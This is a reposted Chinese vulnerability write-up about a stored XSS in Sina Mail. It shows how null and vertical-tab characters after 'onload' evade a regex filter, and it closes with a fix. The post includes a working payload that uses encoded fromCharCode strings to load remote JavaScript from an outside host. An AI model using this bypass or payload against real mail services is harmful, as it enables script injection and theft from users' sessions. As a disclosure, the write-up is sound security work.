当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

新浪邮箱正文存储型XSS,空字节可上传和跨站

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

说到00这个东西,大家最熟悉的应该是上传截断,%00之类的。
00 通常表示字符串结束, 在C里是\0, JS里通常写为\u0000。
关于\0在XSS的应用,好像不算是很多吧,比较有名的 xss list()里对此也只有几个比较古老版本浏览器(IE6,NS啥的)的应用。

这里我发现在IE7,IE9 (没IE8的机器)中都可以使用\u0000来绕过一些正则,此外本文还发现另外一个特殊的字符,可以绕过某些正则的过滤。在详细说明中会提到。

这里我就用这个技巧,绕过了新浪邮箱里的过滤,成功实现XSS。

PS:感谢粽子同学对此测试的帮助。
 1. 其实这个过程是最基本的思路,写入以下HTML内容

<img src=' www.2cto.com /logo/CNVDlogo.jpg' onload='alert(1)'>

2. 不出意外, onload='alert(1)'被过滤掉了。

3. 继续测试过滤方式,www.xuhantao.com,输入以下代码

<img src=' www.2cto.com /logo/CNVDlogo.jpg' onload/='alert(1)'>

4. 看输出 onload\/='alert(1)' 这个可以说明:

新浪不是直接replace掉 onload之类的字符,

5. 经过测试onload空白符=alert('1') 一样会被过滤,可以推出:

大概的正则是 onload\s+=任意连续字符 被过滤为空

6. 根据以上测试结果,我们可以构建一个挑战性的模型如下:

onload某个不是空白的字符=alert('1')

7. 构建一个测试页面: 见()

测试内容主要为 <img src=图片 onload某个字符=alert(某个字符ASCII) />

如果弹出了某个字符,涛涛电脑知识网,就说明这个字符加在onload后面不影响onload=alert()的运行

8. 测试结果中比较意外的有2个,IE9支持0, IE7和IE9都支持11:

浏览器 onload*=alert 测试结果

IE9: 0,32,13,12,11,10,9
IE8: 没机器测试
IE7: 32,13,12,11,10,9,
FF: 32,13,10,9
Chrome:32,9,13,10,12

10. 除了0之外, 这个11 (16进制\u000b)确实挺陌生的,9,10,12,13,都是相对常见的。

11. 既然如此,我们测试 \u0000 ,和 \u000b

12. 由于抓包工具,没办法比较直接的发送这类字符,自己写了个工具发送了一下。
POST的内容大概如下,这里只列出最关键的msgtxt字段:

"msgtxt":"<img src=' www.2cto.com /logo/CNVDlogo.jpg' onload\u000b='-function(){var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.src=String.fromCharCode(47,47,97,112,112,109,97,107,101,114,46,115,105,110,97,97,112,112,46,99,111,109,47,109,46,106,115);document.body.appendChild(s);}()'></img>",

 

13. 由于\u0000仅在IE9下有效,这里我用\u000b绕过。 效果见漏洞证明!

14. 这里还得说一下,\u0000 甚至可以写为

xxx.innerHTML="<img on\u0000load='alert(1)'>" 一样可以运行~

测试证明

测试分别在WIN7+IE9, vista+IE7, XP+IE7进行,均成功!

WIN7+IE9

 



XP+IE7

 


占用一点点存储空间, 俺简陋的工具,也出来露露脸吧!!


修复方案:

过滤\u0000 与\u000b

摘自 gainover

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1